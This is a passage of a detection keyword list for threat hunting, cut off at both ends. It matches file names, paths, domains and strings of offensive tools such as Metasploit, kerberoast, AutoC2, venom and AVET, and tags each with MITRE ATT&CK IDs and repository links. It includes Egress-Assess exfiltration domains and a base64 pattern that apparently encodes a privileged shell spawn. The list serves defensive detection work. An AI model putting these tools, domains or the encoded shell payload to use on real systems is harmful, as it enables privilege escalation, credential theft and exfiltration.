vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*autobloody -*",".{0,1000}autobloody\s\-.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*autobloody.py*",".{0,1000}autobloody\.py.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*autobloody-main*",".{0,1000}autobloody\-main.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - 
T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*AutoBypass.ps1*",".{0,1000}AutoBypass\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*AutoC2.sh*",".{0,1000}AutoC2\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/All.sh*",".{0,1000}AutoC2\/All\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/C2*",".{0,1000}AutoC2\/C2.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" 
"*AutoC2/Dependencies*",".{0,1000}AutoC2\/Dependencies.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Initial_Access*",".{0,1000}AutoC2\/Initial_Access.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Lateral.sh*",".{0,1000}AutoC2\/Lateral\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Payload_Development*",".{0,1000}AutoC2\/Payload_Development.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Recon*",".{0,1000}AutoC2\/Recon.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Situational_Awareness*",".{0,1000}AutoC2\/Situational_Awareness.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Social.sh*",".{0,1000}AutoC2\/Social\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Staging*",".{0,1000}AutoC2\/Staging.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Web.sh*",".{0,1000}AutoC2\/Web\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" 
"*AutoC2/Wireless.sh*",".{0,1000}AutoC2\/Wireless\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoC2/Wordlists*",".{0,1000}AutoC2\/Wordlists.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*AutoCompletionHandlerC2ServerManager*",".{0,1000}AutoCompletionHandlerC2ServerManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*autodiscover/brute.go*",".{0,1000}autodiscover\/brute\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*autoexploit.rc*",".{0,1000}autoexploit\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*autokerberoast.ps1*",".{0,1000}autokerberoast\.ps1.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*autokerberoast_noMimikatz.ps1",".{0,1000}autokerberoast_noMimikatz\.ps1","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*autoKirbi2hashcat.py*",".{0,1000}autoKirbi2hashcat\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential 
Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*autolace.twilightparadox.com*",".{0,1000}autolace\.twilightparadox\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*automachine.servequake.com*",".{0,1000}automachine\.servequake\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*AutoNSE*",".{0,1000}AutoNSE.{0,1000}","offensive_tool_keyword","autonse","Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner. The Nmap Scripting Engine (NSE) is one of Nmaps most powerful and flexible features. It allows users to write (and share) simple scripts (using the Lua programming language ) to automate a wide variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap. or write their own to meet custom needs. 
For more informations https://nmap.org/book/man-nse.html","T1059.001 - T1059.003 - T1059.005 - T1059.006 - T1027 - T1064 - T1086 - T1085","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/m4ll0k/AutoNSE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*autopwn*",".{0,1000}autopwn.{0,1000}","offensive_tool_keyword","autopwn","tools for pentester. autopwn is designed to make a pentesters life easier and more consistent by allowing them to specify tools they would like to run against targets. without having to type them in a shell or write a script. This tool will probably be useful during certain exams as well..","T1583 - T1059 - T1216 - T1053 - T1027","TA0002 - TA0008 - TA0003","N/A","N/A","Exploitation tools","https://github.com/nccgroup/autopwn","1","1","N/A","N/A","4","376","90","2019-04-23T09:58:28Z","2015-02-23T08:18:01Z" "*AutoRDPwn*",".{0,1000}AutoRDPwn.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*autorecon -t *",".{0,1000}autorecon\s\-t\s.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*AutoRecon\autorecon.py*",".{0,1000}AutoRecon\\autorecon\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of 
services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*AutoSmuggle.csproj*",".{0,1000}AutoSmuggle\.csproj.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*AutoSmuggle.exe*",".{0,1000}AutoSmuggle\.exe.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*AutoSmuggle.sln*",".{0,1000}AutoSmuggle\.sln.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*AutoSmuggle-master*",".{0,1000}AutoSmuggle\-master.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*autostart/ares.desktop*",".{0,1000}autostart\/ares\.desktop.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" 
"*AutoSUID-main.*",".{0,1000}AutoSUID\-main\..{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","1","N/A","7","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*autoTGS_NtlmCrack.py*",".{0,1000}autoTGS_NtlmCrack\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*autotimeline *",".{0,1000}autotimeline\s.{0,1000}","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","0","N/A","N/A","2","121","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" "*autotimeline.py*",".{0,1000}autotimeline\.py.{0,1000}","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","121","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" "*autotimeliner.git*",".{0,1000}autotimeliner\.git.{0,1000}","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","121","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" 
"*aux/dump_credentials*",".{0,1000}aux\/dump_credentials.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*aux/enum_system.rc*",".{0,1000}aux\/enum_system\.rc.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*aux/msf/*",".{0,1000}aux\/msf\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*aux/persistence.rc",".{0,1000}aux\/persistence\.rc","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*aux/privilege_escalation.*",".{0,1000}aux\/privilege_escalation\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" 
"*aux/Start-Webserver.ps1*",".{0,1000}aux\/Start\-Webserver\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*auxiliary/crawler*",".{0,1000}auxiliary\/crawler.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*auxiliary/sqli/*",".{0,1000}auxiliary\/sqli\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*av_hips_executables.txt*",".{0,1000}av_hips_executables\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Available ProgIDs and CLSIDs for DLL Hijacking:*",".{0,1000}Available\sProgIDs\sand\sCLSIDs\sfor\sDLL\sHijacking\:.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*avast_memory_dump.md*",".{0,1000}avast_memory_dump\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*avet-master.zip*",".{0,1000}avet\-master\.zip.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*avflagged.exe*",".{0,1000}avflagged\.exe.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted Windows binary from inside memory without a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*avrdude -c usbasp -p m328p -U flash:w:avr.hex*",".{0,1000}avrdude\s\-c\susbasp\s\-p\sm328p\s\-U\sflash\:w\:avr\.hex.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*avred-main.zip*",".{0,1000}avred\-main\.zip.{0,1000}","offensive_tool_keyword","avred","Avred is used to identify which parts of a file are detected by an antivirus and tries to show as much information and context as possible about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*av-update-urls.txt*",".{0,1000}av\-update\-urls\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*aW1wb3J0IG9zOyBvcy5leGVjbCgiL2Jpbi9zaCIsICJzaCIsICItcCIp*",".{0,1000}aW1wb3J0IG9zOyBvcy5leGVjbCgiL2Jpbi9zaCIsICJzaCIsICItcCIp.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","9","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ*",".{0,1000}aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*Aw8KAw4LDgvZDgLUz2rLC2rPBMC*",".{0,1000}Aw8KAw4LDgvZDgLUz2rLC2rPBMC.{0,1000}","offensive_tool_keyword","iodine","iodine. 
